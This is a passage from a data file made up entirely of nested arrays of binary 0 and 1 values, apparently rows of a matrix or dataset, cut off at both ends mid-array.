,1,0,1,1,0,1,0,0,1,1,0,1,0,0,0,1,1,1,0,1,0,1,0,0,1,0,0,0,1,1,1,0,0,0,0,1,1,1,1,1,1,0,1,1,1,1,0,0,0,1,0,0,1,1,0,1,0,0,1,1,0,1,1,0,1,0,1,1,0,1,1,0,0,0,0,1,0,1,0,0],[1,1,1,0,1,1,1,1,1,0,0,1,0,1,0,0,1,0,0,1,0,1,1,0,1,1,1,0,0,1,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,1,1,0,1,1,0,0,1,1,1,1,0,0,0,0,1,0,1,0,0,0,1,0,1,0,0,1,1,0,1,1,0,0,1,1,1,1,1,0,1,0,0,0,1,0,0,0,0,0,0,1,0,1,0,1,0,1,0,0,0,1,1,1,1,1,0,1,0,0,0,0,1,1,0,0,1,0,1,0,0,1,1,1,1,0,1,0,1,0,0,0,1,0,1,1,1,0,0,0,0,0,1,1,1,0,1,0,0,0,1,1,1,1,1,1,1,1,0,0,1,0,0,0,0,1,0,0,0,0,1,0,1,0,1,1,1,0,0,1,0,0,1,1,0,0,1],[1,1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,1,0,1,1,0,0,0,1,1,0,1,0,1,0,0,1,0,0,0,1,1,0,0,0,0,1,0,0,0,0,0,1,1,0,1,0,1,0,0,0,1,1,0,0,0,1,0,1,0,1,0,1,1,1,1,0,0,1,0,0,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,0,1,1,0,1,0,1,0,1,0,1,0,1,0,1,1,1,0,1,0,0,1,0,0,1,1,1,1,1,1,1,1,0,0,0,1,1,0,1,1,0,0,0,1,1,0,1,1,0,1,0,1,0,1,0,1,0,0,0,1,1,1,0,1,1,1,0,0,1,1,0,0,0,1,1,1,1,1,0,0,0,1,1,1,0,1,0,0,1,0,0,1,1,0,1,1,1],[0,0,0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,0,0,1,0,1,1,1,1,1,0,0,0,1,0,0,1,0,0,0,0,1,1,1,1,1,0,1,1,1,0,0,0,1,1,0,0,0,0,0,0,1,0,1,0,0,1,1,0,1,1,1,0,1,0,1,1,0,1,0,1,1,1,0,1,0,0,0,0,1,1,1,0,0,0,1,1,0,0,0,1,0,1,1,1,0,1,0,1,0,0,0,1,0,0,1,1,1,0,1,0,1,1,0,1,0,1,0,1,0,1,1,1,0,1,1,0,0,1,1,0,0,0,0,0,1,1,1,0,0,1,0,1,0,0,0,0,1,1,1,0,1,1,0,0,1,0,1,1,0,0,1,0,1,1,0,1,0,1,0,1,1,1,1,0,0,0,0,1,0,1,1,0,0,0,1,0,0,1,0,0,0,0],[0,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,0,1,0,0,1,0,1,1,0,1,0,1,1,0,1,0,0,0,0,1,0,0,1,0,0,1,1,0,1,0,0,0,1,1,0,0,1,0,1,1,1,0,0,1,0,1,1,0,0,0,0,0,1,0,1,0,0,0,0,1,1,0,0,1,0,0,1,0,1,0,0,0,0,1,0,1,0,1,0,0,1,0,1,1,1,0,1,0,1,0,1,1,0,0,0,1,0,0,0,1,0,0,0,0,0,1,1,0,0,0,1,0,1,1,1,0,0,0,1,1,0,1,1,0,0,1,0,0,1,1,1,1,0,0,1,0,1,0,1,1,1,1,0,0,0,0,1,1,0,1,1,0,1,0,0,0,1,1,0,0,0,1,1,1,0,0,1,0,0,0,1,1,1,1,0,1,1,1,1,1,0,1,0,1,1,1,0],[0,1,1,0,1,1,1,1,1,1,1,1,0,1,0,1,0,0,0,0,0,1,1,1,1,0,0,0,0,1,1,1,0,1,1,0,0,0,1,1,0,0,1,1,1,0,1,1,0,0,1,0,1,0,0,0,0,1,0,0,1,1,1,0,1,1,1,0,1,1,1,1,0,1,0,1,1,0,1,1,1,1,1,1,0,1,1,0,1,0,0,0,1,1,1,1,0,0,1,1,0,0,1,0,0,1,0,1,1,0,1,1,0,0,1,1,1,0,1,1,1,1,1,0,1,1,0,0,0,0,0,0,1,0,1,1,1,0,1,0,0,1,0,1,0,1,1,1,0,0,0,0,1,0,0,1,1,0,1,1,0,0,1,0,0,0,0,0,1,1,1,0,0,1,1,0,1,1,1,0,0,0,1,1,0,1,0,0,0,1,1,1,0,1,0,0,1,1,1,1,0,0,0],[1,1,0,0,0,0,0,1,0,0,1,1,1,1,0,1,0,1,0,1,1,0,0,0,1,1,0,1,1,0,1,1,0,0,1,0,1,1,0,1,0,0,0,1,1,1,1,1,0,1,1,0,0,0,1,0,0,1,1,0,1,0,1,0,1,1,1,1,1,0,1,1,1,0,1,0,1,0,0,1,1,0,0,1,0,1,1,0,1,0,0,0,1,1,1,0,1,1,0,1,0,0,0,0,1,1,1,0,0,0,1,1,0,1,1,1,1,0,0,1,0,0,1,1,0,0,1,0,1,1,0,0,0,0,1,1,0,0,0,0,0,1,1,0,0,1,0,1,1,0,1,1,0,0,0,0,0,0,1,0,0,1,0,1,1,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,1,0,0,1,1,1,1,1,1,0,0,0,1,0,1,0,0,0,0,0,0,1,0],[0,1,1,0,1,1,0,1,0,1,1,0,0,1,0,0,1,0,0,1,1,1,0,1,1,1,0,1,1,0,0,0,0,0,1,1,0,1,1,1,1,0,1,1,1,0,1,0,0,1,1,0,1,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,1,0,0,1,1,1,0,1,1,0,1,1,1,0,1,1,1,0,1,1,1,0,1,0,1,1,0,0,0,1,0,1,1,1,1,1,0,1,0,1,0,1,1,0,1,1,0,1,0,0,1,1,1,1,0,1,1,0,1,0,1,1,0,1,1,0,1,1,1,1,0,0,1,1,1,0,1,0,1,0,1,1,1,1,0,1,1,1,0,0,1,0,0,1,0,1,1,0,0,0,1,1,1,1,0,1,0,0,0,1,1,0,0,0,1,0,1,0,0,1,1,1,0,1,1,0,0,0,1,1,0,0,1,0],[0,0,0,0,0,1,1,0,1,1,1,1,1,1,0,1,0,1,0,0,1,0,0,1,1,1,1,0,1,0,0,1,0,1,1,0,1,0,1,1,1,0,0,0,1,0,1,0,1,1,0,1,0,1,1,1,1,0,1,0,0,0,0,1,0,0,1,0,1,1,0,0,0,1,1,1,0,0,0,1,0,0,1,1,0,0,0,0,0,0,1,1,0,0,0,0,1,1,0,1,1,0,0,1,0,0,1,1,1,1,0,0,1,0,0,0,0,1,1,0,1,1,1,1,1,1,0,0,0,1,0,0,1,0,1,1,0,0,0,1,0,1,1,1,1,0,0,1,0,0,0,1,1,1,0,0,0,0,1,0,0,1,1,0,1,1,0,1,0,1,1,1,0,1,0,1,0,1,1,1,0,0,0,0,1,0,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,0],[1,1,0,0,0,0,0,1,1,1,0,1,0,0,0,0,0,1,0,1,0,0,1,0,1,1,1,0,1,1,0,0,1,1,1,0,1,0,1,1,1,0,0,1,1,1,0,1,1,0,1,1,1,0,0,0,1,1,0,0,0,0,1,0,1,1,1,1,1,1,0,1,1,1,1,0,1,0,0,1,1,1,0,0,0,1,0,0,0,1,1,1,0,0,0,1,1,1,0,0,1,1,0,1,1,1,0,0,0,1,0,1,1,0,0,1,0,1,1,0,1,1,0,0,0,1,1,0,0,0,0,1,1,1,0,1,0,0,0,1,0,0,0,1,1,1,1,0,1,0,1,0,1,0,0,1,1,1,0,0,1,0,0,0,1,1,0,1,1,1,1,0,0,1,1,0,1,1,1,0,1,0,1,0,1,1,0,0,1,1,0,0,1,0,0,1,1,0,1,1,0,1,1],[1,1,1,0,0,1,0,1,0,0,1,0,0,0,1,1,0,1,1,1,1,1,0,1,0,0,1,1,0,1,1,1,1,1,1,0,1,0,1,1,1,0,1,1,1,0,1,1,0,0,0,0,1,0,0,0,0,1,0,0,1,0,0,0,0,1,1,1,0,0,0,1,0,0,1,0,0,1,0,1,1,1,0,0,1,0,0,0,0,1,0,1,1,1,0,0,1,0,1,0,1,0,1,0,0,1,0,1,1,1,1,0,1,0,1,1,0,0,0,0,0,1,0,0,0,1,1,0,1,0,1,1,1,1,1,1,1,0,1,0,1,0,1,1,0,1,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,0,1,1,1,0,0,1,1,0,0,1,0,0,0,1,0,0,1,1,1,0,1,0,1,0,0,1,1,1,0,1,0,0,0,1,0,1,0,0],[0,1,1,1,1,0,0,1,1,1,0,1,1,1,0,1,1,1,1,0,1,0,1,0,1,1,1,1,0,1,1,1,1,1,1,0,0,1,1,0,1,1,0,0,0,1,1,1,0,1,1,1,1,0,1,1,0,0,0,0,0,0,0,1,1,1,1,0,0,1,1,0,1,1,0,0,0,1,1,1,1,0,0,0,1,1,0,1,0,1,0,1,0,0,0,0,1,1,1,1,1,1,0,1,0,0,0,1,0,0,1,1,1,1,0,1,0,1,1,0,0,0,1,0,1,1,0,0,0,0,0,1,1,0,0,1,1,1,0,0,0,0,1,1,0,1,0,0,0,1,1,1,0,1,1,0,1,0,0,1,0,0,0,1,0,0,1,1,0,0,1,1,1,0,0,1,1,1,0,0,1,0,0,1,1,0,1,1,0,1,0,1,0,1,0,0,1,1,1,1,0,1,0],[0,1,0,1,0,0,0,0,0,0,1,1,1,1,1,0,0,1,1,1,1,1,1,0,0,0,0,1,0,0,1,1,0,1,1,1,1,0,1,0,1,1,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,1,1,0,1,1,0,0,1,0,1,0,0,1,1,0,1,1,0,0,1,1,0,0,1,1,1,0,1,1,0,0,1,0,0,0,0,1,0,0,1,1,0,0,0,1,0,1,0,1,0,1,0,0,0,1,0,1,0,0,1,1,0,0,0,0,1,0,0,0,1,1,0,1,0,1,0,0,1,1,0,0,1,0,0,1,0,0,1,1,0,0,0,1,0,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,1,0,1,1,1,1,0,0,1,1,0,1,0,0,1,0,0,0,1,1,0,1,1,1,0,0,0,1,0,0,0,1,0],[1,1,0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,1,1,0,1,0,1,1,1,1,1,1,0,0,1,0,1,1,0,0,1,1,1,0,1,0,1,0,1,1,0,0,1,0,1,0,0,0,0,1,0,1,0,1,1,1,1,1,0,0,1,0,1,1,1,1,0,0,1,1,1,0,0,1,1,1,1,1,0,0,1,1,0,1,0,0,0,0,1,1,1,0,0,1,0,0,0,0,1,1,0,0,1,1,1,0,1,0,1,1,1,0,0,1,1,1,0,0,1,0,0,0,1,0,0,0,1,0,0,1,1,1,1,0,0,0,1,0,0,0,1,1,0,0,0,1,0,0,1,1,1,1,1,1,1,1,0,0,1,0,0,0,1,0,1,1,0,0,1,1,0,0,0,0,0,0,1,1,0,1,1,1,0,1,1,1,0,1,0,1,0,0,1,0,1,1,0],[1,1,1,1,0,1,1,0,1,1,0,1,1,0,0,0,0,1,1,1,0,0,1,1,0,0,0,0,1,1,0,0,1,1,0,0,0,1,0,1,1,0,1,1,0,1,1,0,1,1,0,0,0,1,1,1,1,0,1,0,1,1,1,0,1,0,0,0,1,0,1,0,1,0,0,0,1,1,0,1,0,1,1,0,1,0,1,1,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,1,0,0,1,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0,1,1,1,0,1,1,1,1,0,0,0,0,0,0,0,0,1,0,1,0,1,1,0,0,1,1,0,0,0,1,1,0,1,0,1,1,0,0,0,1,0,1,0,1,1,0,0,1,0,1,0,0,1,1,1,0,1,1,0,0,1,0,0,0,0,0,0,1,0,1,1,0,0,1,0,1,1,0,0],[0,1,0,0,0,1,0,0,0,1,0,1,0,1,0,0,1,1,1,0,1,1,1,0,0,0,0,1,0,1,0,0,0,1,0,0,1,1,0,0,0,1,0,0,0,0,1,1,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,1,1,0,1,0,0,1,0,1,1,1,0,1,1,1,1,1,0,1,0,1,1,1,1,0,0,0,1,1,0,0,1,0,0,1,0,0,0,0,0,1,0,0,1,0,0,1,1,1,0,0,0,1,1,0,1,1,0,0,1,1,1,0,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,0,0,1,1,1,0,0,0,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,1,1,0,1,0,0,0,0,1,1,1,0,0,1,0,0,0,1,1,0,0,0,0,1,1,0,1,1,0,0,0,1,1,0,0],[1,0,0,0,1,1,0,0,1,0,1,0,0,0,1,0,1,1,1,1,0,0,0,0,0,0,1,0,1,1,0,0,1,0,1,1,0,1,1,0,0,0,1,0,1,0,1,1,1,1,0,1,1,1,1,1,0,1,0,0,1,1,0,0,1,0,0,1,1,1,0,1,1,1,1,0,1,0,0,0,0,1,1,1,1,1,0,1,0,0,0,1,1,0,1,1,1,1,0,1,1,0,0,1,1,1,1,1,0,0,1,0,0,0,1,1,1,0,1,1,0,0,0,0,0,1,0,0,1,0,1,1,1,1,1,0,0,1,0,1,0,0,1,1,1,1,1,1,0,0,0,1,0,0,1,1,0,1,0,1,0,0,0,1,1,0,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,0,1,0,0,0,0,1,0,1,0,1,0,0,0,0,0,0,1,1,0,1,1],[0,1,0,1,1,0,1,0,0,1,1,1,1,0,1,1,1,0,0,0,1,0,1,1,0,1,1,1,0,0,0,1,1,1,1,0,0,1,0,0,0,0,0,1,0,1,0,0,0,1,1,0,0,0,1,1,0,0,0,1,1,1,0,0,0,1,0,1,1,0,1,1,1,0,1,0,1,1,0,0,1,1,1,0,1,0,1,0,1,0,1,0,0,1,0,1,1,1,0,1,0,0,0,1,1,0,1,1,1,0,0,0,0,1,1,1,0,0,1,0,1,1,1,0,1,1,1,1,1,0,0,1,1,1,1,1,0,1,1,0,1,1,0,1,0,0,1,1,0,1,0,0,0,1,0,1,0,0,1,1,0,0,1,1,0,0,1,0,0,0,1,1,1,1,1,0,1,0,0,1,1,1,1,0,1,1,1,1,0,1,0,1,1,1,0,0,1,1,0,1,0,0,0],[1,1,1,1,1,0,1,0,1,1,1,1,1,1,0,0,0,0,1,0,1,1,1,1,1,1,0,1,0,1,1,1,1,0,0,0,0,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,1,0,1,0,1,1,1,0,1,1,1,0,0,0,1,1,0,1,0,1,0,0,0,0,1,0,0,1,1,1,1,1,1,1,0,0,1,1,0,0,0,1,0,1,1,0,1,0,0,0,1,1,1,0,0,0,1,1,0,0,1,0,0,0,0,0,0,1,0,0,0,0,1,1,1,1,0,0,1,1,1,0,0,1,0,1,0,1,1,1,1,1,1,0,1,0,0,0,0,1,1,1,1,1,1,0,1,1,0,1,0,1,1,1,0,1,1,1,0,0,0,1,0,0,1,1,1,1,0,0,1,1,0,1,0,0,1,1,0,0],[1,1,0,1,1,0,0,0,0,1,1,0,0,0,0,1,1,1,0,1,0,0,0,0,1,1,0,1,1,0,0,1,0,0,1,0,0,1,0,0,0,0,1,1,1,1,0,1,1,0,1,0,1,1,1,1,0,1,0,1,1,0,1,1,1,0,0,1,1,1,0,0,1,0,0,0,1,0,0,1,0,0,1,1,0,1,1,1,1,1,1,1,1,1,1,0,1,0,1,0,1,1,1,0,0,1,0,0,1,1,0,0,0,0,1,0,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,0,0,1,1,0,1,0,0,1,1,0,1,1,1,0,0,1,1,1,0,1,0,0,1,0,0,1,1,0,1,0,1,0,1,1,0,0,1,0,1,1,1,0,0,1,1,1,1,0,0,1,0,1,0,1,1,1,1,1,1,0,1,1,1,0,0,1,0],[1,1,1,0,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,0,1,0,0,0,1,1,0,1,1,1,1,1,0,0,0,0,0,0,1,0,1,0,1,1,0,0,0,0,1,0,1,0,0,1,1,1,1,1,1,0,1,0,0,0,1,1,0,1,1,1,0,0,1,0,0,0,1,1,0,0,0,0,0,0,1,0,0,0,1,1,0,0,0,1,0,1,0,1,1,0,1,1,1,1,1,0,1,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,1,1,1,0,0,1,0,1,1,1,0,1,1,1,1,1,0,1,0,0,1,1,1,1,0,1,1,1,1,1,1,1,1,0,1,1,1,0,1,1,1,0,1,0,1,1,0,1,1,1,0,1,0,1,1,0,1,0,1,0,1,0,1,1,1,0,0,0,1,1,0,1,1,0,0,0,0,0,0,1,1],[1,0,1,1,1,1,1,1,0,0,0,0,1,1,0,0,1,0,1,1,0,0,0,0,0,1,0,0,0,0,0,0,1,1,0,0,1,0,0,1,0,0,1,0,1,0,1,0,1,1,0,0,1,0,1,0,0,1,1,1,0,0,1,1,1,0,0,1,1,0,0,1,1,0,0,1,0,0,0,1,1,0,1,1,1,0,1,1,0,0,0,1,0,0,1,1,1,1,0,0,0,1,1,0,0,1,1,1,1,1,1,0,1,0,1,1,0,0,1,1,1,1,0,0,0,1,1,1,1,0,1,1,1,0,0,0,1,0,1,0,1,0,1,0,1,0,0,0,0,1,0,0,0,0,0,1,1,1,0,1,1,1,0,0,1,0,0,0,1,1,0,0,1,0,1,1,0,1,0,0,1,1,0,1,0,1,1,1,0,0,1,1,1,0,1,1,1,1,0,0,1,0,0],[0,0,0,1,0,1,1,0,0,1,0,0,0,0,1,0,1,1,0,0,1,0,0,0,0,1,0,0,1,1,0,0,1,0,0,1,0,0,0,1,0,1,0,1,0,1,0,1,1,1,0,0,0,0,1,0,1,0,0,0,0,0,1,1,0,0,0,0,0,1,0,1,0,1,0,1,0,0,1,0,0,1,0,0,0,0,1,1,1,1,1,1,0,1,0,0,1,0,0,0,0,1,1,0,0,1,0,1,0,0,1,0,1,1,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,0,1,1,0,0,0,0,0,0,1,1,1,1,0,0,1,1,1,1,0,0,1,0,1,0,1,1,0,1,0,0,1,1,0,0,0,1,1,0,0,1,1,0,0,1,1,0,1,0,0,1,1,0,1,0,0,0,1,1,1,1,0,0],[0,0,1,0,0,1,0,1,1,1,1,0,1,0,0,0,0,0,1,1,1,0,0,0,0,1,1,1,0,1,0,1,1,1,0,1,1,1,1,1,1,0,1,1,0,0,1,1,1,1,0,1,0,0,0,1,0,1,1,0,0,0,1,0,0,0,0,1,0,0,0,1,0,1,1,0,1,0,1,0,0,1,1,1,1,1,1,0,1,1,1,1,0,0,1,0,1,1,0,0,1,0,1,1,1,0,0,0,0,0,0,0,0,1,0,0,1,0,1,0,0,1,0,1,1,1,1,0,1,1,0,0,1,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,1,0,1,1,0,1,1,1,0,1,1,0,1,0,0,0,1,1,1,1,0,0,1,1,1,1,1,0,0,0,1,1,0,1,1,1,0,0,0,1,0,1,0,1,1,1,0,1,1],[1,0,1,1,1,0,0,0,1,0,1,0,0,0,0,0,1,1,0,0,1,1,1,0,1,0,1,1,1,0,0,0,0,0,1,1,1,1,1,1,1,1,0,1,1,0,1,1,0,1,1,0,1,0,1,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,1,1,1,1,0,1,0,0,0,1,1,1,0,1,0,1,1,1,1,0,1,1,1,0,1,0,0,1,0,1,0,0,1,0,1,0,0,1,0,1,0,1,1,1,1,1,1,1,0,1,0,1,1,1,1,0,0,0,1,0,1,1,1,0,1,0,1,1,1,1,1,1,0,1,1,0,0,0,1,0,1,1,0,0,0,1,1,0,0,1,0,1,0,0,1,0,1,0,0,0,1,0,0,1,1,1,0,1,1,0,1,1,1,1,1,0,1,1,1,1,0,0,1,1,0,0,0,0,1],[1,0,0,1,1,1,0,1,0,1,0,0,0,0,1,1,0,1,0,1,0,0,1,0,0,1,1,0,1,0,0,1,0,0,1,0,1,1,1,1,1,1,0,0,0,1,0,1,1,0,1,1,1,1,1,0,0,0,1,0,0,1,1,1,0,1,0,1,0,0,0,1,0,0,1,0,0,0,1,1,0,1,0,1,0,0,1,0,1,0,1,1,0,0,0,0,1,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,1,0,0,0,0,0,1,1,1,0,0,0,0,0,1,0,1,0,0,1,0,0,0,0,1,0,1,1,0,0,0,1,0,0,1,1,1,1,1,0,1,0,1,0,0,0,1,0,0,1,0,1,1,0,0,1,1,0,1,1,1,0,0,0,1,0,1,1,0,1,0,1,1,1,1,1,1,1,1,1,0,0,1,0,1,1,1,0,0,0,0],[0,1,1,0,0,1,0,0,0,1,1,1,1,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,1,1,1,1,0,1,0,1,0,0,1,0,1,0,1,0,0,0,0,1,1,0,0,1,1,1,0,1,0,1,0,1,1,0,1,1,1,1,0,0,0,1,1,0,1,0,0,0,0,1,0,1,1,0,1,0,1,0,1,0,0,1,0,0,1,0,0,0,1,0,1,0,1,0,0,1,0,0,1,0,0,0,0,1,1,1,1,1,0,1,1,1,1,0,0,1,1,0,1,0,1,1,1,1,0,1,0,1,0,1,1,1,0,0,1,1,0,0,0,1,1,0,0,1,0,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,0,1,1,1,0,0,0,0,1,1,0,0,0,1,0,1,0,0,1,1,0,1,0,0,1,0,0,1,0,1],[0,1,1,0,0,1,1,0,1,1,0,1,0,0,1,1,1,0,1,1,1,1,0,0,1,1,1,0,1,1,0,1,1,1,1,1,1,0,0,0,0,1,1,1,0,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,1,1,1,0,1,1,1,1,1,0,0,1,1,0,0,0,0,1,1,0,1,1,1,1,0,1,1,1,1,0,0,0,1,1,0,1,0,1,1,1,0,1,0,0,0,0,0,1,0,1,0,1,0,1,0,1,1,0,1,1,0,1,0,1,1,1,1,0,1,0,1,0,0,1,1,0,1,0,0,0,1,0,0,1,0,1,1,1,1,0,0,1,1,1,1,0,0,0,1,0,1,1,0,1,1,0,1,1,1,1,0,0,0,1,0,1,0,0,1,0,0,0,0,0,0,0,1,1,0,1,1,1,1,0,0,1,0,1,1,1,0,0,0],[1,1,0,1,1,1,1,1,0,1,1,0,1,1,0,1,1,0,0,0,1,1,0,0,0,0,1,1,0,0,0,1,0,1,1,1,1,0,0,1,0,0,0,1,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,1,1,1,1,0,1,0,0,1,1,0,1,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,0,0,1,1,1,0,1,1,0,0,0,1,0,1,1,1,1,1,0,1,1,0,0,1,1,1,0,0,0,1,1,1,0,0,1,1,0,0,1,0,1,1,0,1,0,1,1,1,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,1,0,0,0,0,1,1,1,0,0,0,1,1,0,0,0,0,0,0,1,0,0,1,1],[0,0,1,1,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,1,0,1,1,0,0,0,1,1,1,1,1,1,1,1,0,1,1,1,1,0,0,1,0,0,1,1,0,0,1,1,1,0,1,1,0,0,0,1,1,1,1,0,0,0,1,0,1,0,0,0,1,1,0,1,1,1,0,1,1,1,1,0,1,0,0,0,0,0,0,0,1,1,0,1,1,0,1,1,0,0,0,1,0,0,0,1,1,1,0,0,1,1,1,0,1,0,0,0,1,1,1,0,1,0,0,0,0,0,1,0,1,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1,1,1,1,1,1,1,1,0,1,1,1,1,0,1,0,1,0,1,1,0,1,1,1,1,0,0,0,0,1,1,0,0,1,1,0,1,1,0,1,1,0,1,0,0,0,1,0,0,1],[1,0,0,0,1,0,0,0,1,0,0,1,1,0,0,1,1,1,0,0,1,1,1,0,0,0,0,1,1,0,0,0,0,1,1,1,0,0,1,0,1,0,0,1,1,1,1,1,0,0,0,1,1,0,1,0,1,0,0,1,1,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,1,1,0,0,1,1,0,0,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,1,1,1,0,0,0,1,1,0,1,0,1,0,0,1,0,0,0,0,1,0,1,0,0,1,1,1,0,1,1,1,0,0,0,1,1,0,0,1,1,1,1,0,0,1,1,1,1,1,1,0,1,1,1,1,1,1,0,0,1,1,1,0,0,1,1,0,1,1,1,0,1,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,1,0,1,1,1,1],[0,0,1,0,1,1,0,0,1,1,1,0,1,1,0,1,1,0,1,1,1,1,1,0,0,1,1,0,0,1,0,1,0,0,0,0,0,1,0,1,0,1,0,0,0,1,1,1,1,0,0,1,0,1,1,0,0,0,0,1,1,1,0,0,0,0,0,0,1,0,1,0,0,1,1,1,0,0,0,1,0,1,1,0,0,0,0,0,1,1,0,1,0,1,0,1,1,1,1,0,0,0,0,1,0,1,0,1,0,0,0,0,1,0,0,1,1,0,1,1,1,1,1,0,1,1,1,0,1,1,1,0,1,1,1,0,0,0,1,0,1,1,0,0,1,1,1,0,0,1,1,1,0,1,1,1,0,0,1,0,0,1,1,0,1,0,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,1,0,1,0,0,1,0,0,1,1,1,1,0,1,1,0,0,1,0,1,0],[0,0,1,1,0,0,0,1,1,0,1,0,0,1,1,0,0,1,0,0,0,1,1,1,0,0,0,1,1,1,1,1,1,0,1,0,1,0,0,1,0,0,1,1,0,0,1,0,0,1,0,1,0,0,1,1,1,1,0,1,1,0,0,1,1,1,0,1,1,0,0,0,1,1,0,0,1,0,0,0,1,0,0,1,1,0,0,0,1,0,1,1,0,1,1,1,0,1,0,0,1,1,0,1,1,1,1,1,1,0,0,0,1,0,1,1,1,0,0,0,1,0,1,0,0,0,1,0,0,0,0,1,0,1,1,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,1,1,0,1,0,1,1,1,0,0,1,1,1,1,1,1,0,1,1,0,0,1,1,0,1,1,0,1,0,1,1,1,1,0,1,1,1,1,1,0,0,0,0,1,0,0,0,0,0,1,0],[1,0,0,0,0,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,0,1,0,1,0,0,0,0,0,1,0,0,1,1,1,1,0,1,1,1,1,0,0,0,1,0,1,0,1,0,0,0,1,0,1,0,0,1,1,0,0,0,1,0,0,1,0,1,0,1,1,1,1,1,0,0,0,0,0,0,1,1,0,0,0,1,0,1,1,1,1,1,1,1,0,1,0,1,1,0,1,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,1,1,0,1,1,1,0,0,0,0,0,1,1,0,1,1,0,1,0,1,1,0,1,0,1,1,0,0,1,1,0,0,0,1,1,1,0,0,0,1,0,1,1,1,1,1,1,0,0,0,0,1,0,0,1,0,1,1,1,0,1,0,1,1,1,1,1,0,1,0,1,0,1,0,0,0,0,1,0,0,1],[0,0,1,1,1,1,0,1,0,1,1,0,0,0,0,0,0,1,0,0,0,1,1,0,0,0,1,1,1,0,1,1,0,1,1,0,1,1,0,1,1,0,1,0,1,0,0,0,0,1,0,1,0,1,1,0,1,0,1,0,1,0,1,0,0,1,1,1,1,0,1,0,1,0,1,0,0,1,0,1,0,0,0,1,0,1,1,1,1,0,0,1,0,0,1,1,1,1,0,1,1,1,0,0,1,0,1,1,0,1,1,0,0,0,1,0,1,1,0,1,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,1,0,1,0,1,1,0,0,0,1,0,1,0,1,0,0,1,0,1,0,0,0,0,1,1,0,0,1,1,1,1,0,1,0,0,1,1,1,0,1,0,0,0,1,0,1,0,0,0,1,1,1,0,1,0,1,0,0,1,0,0,1,1,0,1,1,1,0],[1,1,1,0,1,0,1,1,1,0,1,0,0,1,0,0,0,0,0,0,0,0,1,1,1,1,0,1,0,0,1,1,1,0,1,1,1,1,1,0,1,1,0,1,0,0,0,1,0,0,1,0,0,0,1,1,0,0,1,0,0,1,0,0,1,1,0,0,0,1,0,1,0,1,0,0,0,0,1,1,0,0,0,0,0,1,1,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,1,0,1,0,0,0,1,0,1,0,0,0,0,0,1,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,1,1,1,1,0,1,0,0,0,1,1,1,0,1,0,0,1,0,0,0,0,1,0,1,0,0,1,1,1,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,0,1,1,0,0,1,1,1,1,1,0,0,1,1,1],[1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,0,1,0,1,1,0,0,0,0,0,1,0,1,0,1,0,1,0,0,1,0,0,0,0,1,1,0,0,0,0,1,0,1,1,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,0,0,1,1,0,0,1,0,0,0,1,0,0,1,1,0,0,1,1,0,1,0,0,0,1,1,1,1,0,0,0,1,0,0,1,1,1,1,1,0,0,1,1,1,1,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,1,0,1,1,1,1,1,1,1,0,1,1,1,0,1,0,0,1,0,1,0,0,0,1,0,0,1,0,1,1,0,0,0,0,0,1,1,0,1,0,0,1,0,0,1,1,1,1,1,0,1,0,0,1,0,0,1,1,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0],[1,0,1,1,0,0,0,0,1,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,1,0,1,0,0,0,1,1,1,1,0,0,0,0,1,1,0,1,0,0,0,1,1,0,1,1,0,1,1,0,0,0,0,0,1,1,0,1,0,1,1,0,0,0,0,0,0,0,1,1,1,0,0,0,1,1,1,0,1,0,1,0,